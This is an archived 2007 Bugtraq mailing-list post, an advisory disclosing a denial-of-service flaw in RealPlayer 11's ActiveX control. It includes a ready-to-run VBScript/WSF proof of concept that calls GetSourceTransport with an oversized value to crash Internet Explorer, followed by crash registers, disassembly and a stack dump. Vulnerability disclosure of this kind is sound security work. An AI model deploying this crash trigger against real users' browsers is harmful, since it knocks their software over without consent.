Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Bugtraq
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2

from [thesinoda] Network Security [Permanent Link]
Subject: DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2
Date: 29 Nov 2007 23:34:50 -0000 
+-----------------------------------------------------------------.
Affected    : Realplayer 11 ActiveX on Win Vista and Win XP SP2   :
Type        : DOS Attack                                          :
Date        : 28-11-2007                                          :
Author      : Adonis, Abed                                        :
Link        : http://www.safehack.com/Advisory/realpdos.txt       :
+-----------------------------------------------------------------.
                                                                  :

+-------------.                                                   :
 Brief History \                                                  :
+---------------`-------------------------------------------------.
GetSourceTransport() fails to handle exceptional conditions, which:
leads to a DoS (Denial of Service) attack.                        :
                                                                  :
GetSourceTransport() is found in rmoc3260.dll which is installed  : 
with RealPlayer 11.                                               :
                                                                  :
Note: This ActiveX can be loaded by IE or any other browser.      : 
                                                                  :
Successful exploitation will lead to a remote crash in IE 6/7.    :
                                                                  :
+-----------.                                                     :
 The Problem \                                                    :
+-------------`---------------------------------------------------.
RealPlayer 11 ActiveX DoS Proof-of-Concept                        :
                                                                  :
                                                                  :
-:PoC:-                                                           :
1- Copy and past the following code into filepoc.wsf              : 
2- Run it by double clicking on it                                :
---------------------------------------------------snip-----------:
<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA' id='target' />
<script language='vbscript'>

targetFile = "C:\Windows\system32\rmoc3260.dll"
prototype  = "Function GetSourceTransport ( ByVal nSourceNum As Integer ) As 
String"
memberName = "GetSourceTransport"
progid     = "RealAudioObjects.RealAudio"
argCount   = 1

arg1=32767

target.GetSourceTransport arg1 

</script></job></package>
---------------------------------------------------snip-----------:

Registers:
--------------------------------------------------
EIP 637F4A02 -> 00000000
EAX 0022EC44 -> 00000000
EBX 663CCB38 -> 663B7400 -> Uni: t;ft;f
ECX 0022EC44 -> 00000000
EDX 01536388 -> 638416B8
EDI 00000000
ESI 00000000
EBP 0022EC68 -> 0022EC78
ESP 0022EC3C -> 00000000

Block Disassembly: 
--------------------------------------------------
637F49F2        JE SHORT 637F49F8
637F49F4        MOV ESI,EAX
637F49F6        JMP SHORT 637F49FA
637F49F8        XOR ESI,ESI
637F49FA        LEA ECX,[EBP-24]
637F49FD        CALL 6381C1F0
637F4A02        MOV EDX,[ESI]     <--- CRASH
637F4A04        LEA EAX,[EBP-4]
637F4A07        PUSH EAX
637F4A08        PUSH 638427D8
637F4A0D        PUSH ESI
637F4A0E        CALL [EDX]
637F4A10        MOV EAX,[EBP+8]
637F4A13        SUB EAX,46
637F4A16        JE 637F4B28

Stack Dump:
--------------------------------------------------
22EC3C 00 00 00 00 F4 EC 22 00 00 00 00 00 F4 EC 22 07  [................]
22EC4C C0 6D 53 01 00 00 00 00 30 ED 22 00 00 00 00 00  [.mS.............]
22EC5C 00 00 00 00 DC 9A 2B 00 00 00 00 00 78 EC 22 00  [................]
22EC6C A8 C7 7F 63 47 00 00 00 FF 7F 00 00 90 EC 22 00  [...cG...........]
22EC7C 8E 48 3B 66 88 63 53 01 47 00 00 00 FF 7F 00 00  [.H.f.cS.G.......]
                                                                  :
                                                                  :
Peace to you all:all and Happy New Year full of health and Peace  :
+-----------------------------------------------------------------.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • DOS in Realplayer 11 ActiveX on Win Vista and Win XP SP2, thesinoda <=
Previous by Date:  Re[2]: Microsoft FTP Client Multiple Bufferoverflow Vulnerability, Matthew Leeds
Next by Date:  Re[2]: Microsoft FTP Client Multiple Bufferoverflow Vulnerability, 3APA3A
Previous by Thread:  [ MDKSA-2007:224-3 ] - Updated samba packages fix regressions, security
Next by Thread:  SCARE metrics and tool release, Pete Herzog
Indexes:  [Date] [Thread] [Top] [All Lists]